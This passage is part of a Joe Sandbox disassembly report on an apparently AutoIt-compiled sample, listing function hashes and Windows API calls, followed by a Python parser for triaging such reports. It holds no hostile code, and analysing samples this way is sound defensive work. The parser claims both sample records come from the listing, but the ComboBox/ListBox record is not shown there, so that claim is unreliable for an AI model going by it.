                                                          • Opcode ID: 92c968447b2c6257fef2fcaac5ea53960ecf693b6d7801840efeef0274814ee0
                                                          • Instruction ID: 40726d62ab911f7cff03cfd0c7533ed5f36315e83c028a6fcb4df8694e80d09f
                                                          • Opcode Fuzzy Hash: 92c968447b2c6257fef2fcaac5ea53960ecf693b6d7801840efeef0274814ee0
                                                          • Instruction Fuzzy Hash: CAF04F71378A138BEB398F58BC156E167A9E70C720F14D86AF109DA294E77488934A90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 4105c22fd113f0b2550e1432e02c96288c429464ec8c0287be539e18f762c766
                                                          • Instruction ID: fc64ffe9a35fd9f5cf11b38e4e5fe17d16d4314e577f2b0a7842d1dd593c6fc7
                                                          • Opcode Fuzzy Hash: 4105c22fd113f0b2550e1432e02c96288c429464ec8c0287be539e18f762c766
                                                          • Instruction Fuzzy Hash: A1E0D17254022917D720DB59AC49FD7FBACDB55771F000057FD44D7051D570D95587D0
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002A88A0
                                                            • Part of subcall function 00273588: _doexit.LIBCMT ref: 00273592
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 2679ce2fe3b87c777b1755b39e61d9a8ec69cf94faf6c9f88007ce5aa43b3f8d
                                                          • Instruction ID: e895b6539c2fcebe47f91702c42cdcfceb90069200b6278cbc281383e9adcc08
                                                          • Opcode Fuzzy Hash: 2679ce2fe3b87c777b1755b39e61d9a8ec69cf94faf6c9f88007ce5aa43b3f8d
                                                          • Instruction Fuzzy Hash: 4BD02B313E135832C21132A87C1BFCA3B4C8F06B50F404026FB0C651C34DE685F046E5
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00290091
                                                            • Part of subcall function 002CC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0029027A,?), ref: 002CC6E7
                                                            • Part of subcall function 002CC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC6F9
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00290289
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: bc36bd45305b9a9752bf3011382f7ff5f2e0534f12447b069cf6af407011bccd
                                                          • Instruction ID: e8cbd578d5d3df62b948a2ef3530b0c5756fc6bdc19999011c31e84d65388420
                                                          • Opcode Fuzzy Hash: bc36bd45305b9a9752bf3011382f7ff5f2e0534f12447b069cf6af407011bccd
                                                          • Instruction Fuzzy Hash: F3F0157086410ADFCB15DBA1D9C8BECBAB8AB08300F240085E106A6090CBB14E95CF20
                                                          APIs
                                                          • DestroyIcon.USER32(,z10z1,00317A2C,00317890,?,00265A53,00317A2C,00317A30,?,00000004), ref: 00265823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: DestroyIcon
                                                          • String ID: ,z10z1$SZ&,z10z1
                                                          • API String ID: 1234817797-1708137086
                                                          • Opcode ID: 41092f0df1efcf72107529943297ce587f310963ec66d19c59a453a896b26b66
                                                          • Instruction ID: cba2c1091ad469f0c9e68d0ccb1e619df05c66561669488c296e26ff1c8b7b79
                                                          • Opcode Fuzzy Hash: 41092f0df1efcf72107529943297ce587f310963ec66d19c59a453a896b26b66
                                                          • Instruction Fuzzy Hash: 59E0173242426BEBEB311F49E804B95FBE8AF65321F648426E4845B561D3F568F0CB94
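The function records above are machine-generated and easiest to triage in bulk: each one carries its direct and subcall API references, a "String ID" whose entries are joined with "$", and the fuzzy hashes. The following parser is an added example, not part of the Joe Sandbox report or of its tooling; it turns this listing format into Python dicts, counts referenced APIs, and flags functions whose strings match the AutoIt runtime markers visible in the MessageBoxW record above ("AutoIt", "Error allocating memory."). The sample input is a constructed excerpt of two records from this section with the Memory Dump Source block omitted; the record layout it assumes (an "APIs" heading opening each function, "Similarity" fields as "Key: Value" bullets) is exactly what is shown on this page and nothing more.

```python
import re
from collections import Counter
from typing import Dict, List

# Constructed sample input: two records excerpted from the listing above,
# with their Memory Dump Source blocks dropped. Embedded so this runs offline.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
  • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
• SendMessageW.USER32(?,00000182,?,00000000), ref: 002A99A6
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: dab4e8c72b224075d798458c98f23fa299c07c7f63b1870c22b24493590c2c82
• Instruction Fuzzy Hash: 6101DB72A6210577CB11EBA4CD52EFFB3AC9F16340F140019B845A3281DE655E78DA72
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002A88A0
  • Part of subcall function 00273588: _doexit.LIBCMT ref: 00273592
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 2679ce2fe3b87c777b1755b39e61d9a8ec69cf94faf6c9f88007ce5aa43b3f8d
• Instruction Fuzzy Hash: 4BD02B313E135832C21132A87C1BFCA3B4C8F06B50F404026FB0C651C34DE685F046E5
"""

# One API reference line: optional "Part of subcall function <addr>: " prefix,
# then Name.MODULE, an optional "(args)" list, then "ref: <addr>".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\(.*\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): (?P<value>.+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Strings the report attributes to the embedded AutoIt interpreter (see the
# MessageBoxW record above); used only as a triage heuristic here.
AUTOIT_MARKERS = {"AutoIt", "Error allocating memory."}


def parse_report(text: str) -> List[Dict]:
    """Split a Joe Sandbox function listing into one dict per function record."""
    records: List[Dict] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()     # drop indentation and bullet glyph
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                     # every record opens with its APIs block
                records.append({"calls": [], "subcalls": [], "fields": {}})
            section = line
            continue
        if not records:
            continue                               # tail of a record cut off at the top
        rec = records[-1]
        m = CALL_RE.match(line)
        if section == "APIs" and m:
            target = rec["subcalls"] if m.group("sub") else rec["calls"]
            target.append((m.group("name"), m.group("module"), m.group("ref")))
            continue
        m = FIELD_RE.match(line)
        if m:
            rec["fields"][m.group("key")] = m.group("value")
    for rec in records:
        sid = rec["fields"].get("String ID", "")
        rec["strings"] = sid.split("$") if sid else []   # String ID joins strings with '$'
    return records


def autoit_indicators(records: List[Dict]) -> List[str]:
    """API IDs of functions whose referenced strings match the AutoIt markers."""
    return [r["fields"].get("API ID", "?") for r in records
            if AUTOIT_MARKERS & set(r["strings"])]


def api_histogram(records: List[Dict]) -> Counter:
    """Count Name.MODULE over direct calls and subcall references."""
    counts: Counter = Counter()
    for r in records:
        for name, module, _ref in r["calls"] + r["subcalls"]:
            counts[f"{name}.{module}"] += 1
    return counts


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for r in recs:
        print(r["fields"].get("API ID"), r["strings"], [c[0] for c in r["calls"]])
    print("AutoIt markers in:", autoit_indicators(recs))
    print(api_histogram(recs).most_common(3))
```

Feed it the whole function listing of a report and the histogram gives a quick view of which USER32/KERNEL32 entry points the sample touches, while the String ID split recovers strings that the empty "Strings" headings in this rendering do not show; the Instruction Fuzzy Hash field stays available in `fields` for clustering records across reports.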